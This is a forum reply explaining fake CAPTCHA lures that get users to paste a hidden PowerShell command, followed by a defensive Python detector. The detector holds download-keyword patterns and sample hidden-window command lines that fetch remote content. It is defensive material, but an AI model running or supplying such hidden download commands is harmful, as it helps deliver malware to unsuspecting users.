Post
Topic
Board Beginners & Help
Re: Hackers Disguise Malware as Captcha
by
promise444c5
on 28/08/2025, 00:47:46 UTC
Anything beyond checking(.) of those images required in their boxes looks suspicious, just that most inexperienced/unaware users will likely fall for it
Threat actors are getting really creative these days and it's very scary that they use normal harmless processing for their malicious activities.
Yes, they are getting creative and part of that creativity is what OP mentioned. There have been fake captchas before as well, only now they use more polished tricks to make them less suspicious and more effective.
This method relies on a shorthand way of executing a command with PowerShell (PS), which then downloads malware or a text file containing extra commands that can trigger the download process... The tricky part is that the process is less suspicious because the copied command often includes the param "-w hidden" to make PowerShell run quietly in the background.
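
A defender-side check for the pattern described in the post above, added here as an example that is not part of the original post: it flags PowerShell process command lines that request a hidden window and escalates when a download command also appears. The function names, verdict labels and sample command lines are constructed for illustration.

```python
import re
import shlex

# First token must be the PowerShell host, with or without a path.
POWERSHELL = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.IGNORECASE)
# Common ways a command line fetches remote content.
DOWNLOAD = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|curl|wget|start-bitstransfer)\b", re.IGNORECASE)

def tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes intact."""
    try:
        return [t.strip("'\"") for t in shlex.split(cmdline, posix=False)]
    except ValueError:          # unbalanced quotes: fall back to whitespace
        return [t.strip("'\"") for t in cmdline.split()]

def has_hidden_window(toks):
    """True for -WindowStyle Hidden or any prefix of it such as -w or -win.
    A '/' switch prefix is treated the same way (an assumption of this example)."""
    return any(
        len(flag) > 1 and flag[0] in "-/"
        and "windowstyle".startswith(flag[1:].lower())
        and value.lower() == "hidden"
        for flag, value in zip(toks, toks[1:]))

def classify(cmdline):
    """Return 'alert', 'review' or 'ignore' for one process command line."""
    toks = tokens(cmdline)
    if not toks or not POWERSHELL.search(toks[0]):
        return "ignore"
    if not has_hidden_window(toks):
        return "ignore"
    # Hidden window alone can be a legitimate scheduled job, so only review it.
    return "alert" if DOWNLOAD.search(cmdline) else "review"

# Constructed sample command lines (example.invalid is a reserved name).
SAMPLES = [
    r'powershell -w hidden -c "iwr https://example.invalid/verify.txt"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile '
    r'-WindowStyle Hidden -File C:\Scripts\backup.ps1',
    r'powershell.exe -NoProfile -Command "Get-Process"',
    r'cmd.exe /c echo -w hidden',
    r'pwsh -WIN "Hidden" -c "Invoke-RestMethod https://example.invalid/x"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line):7} {line}")
```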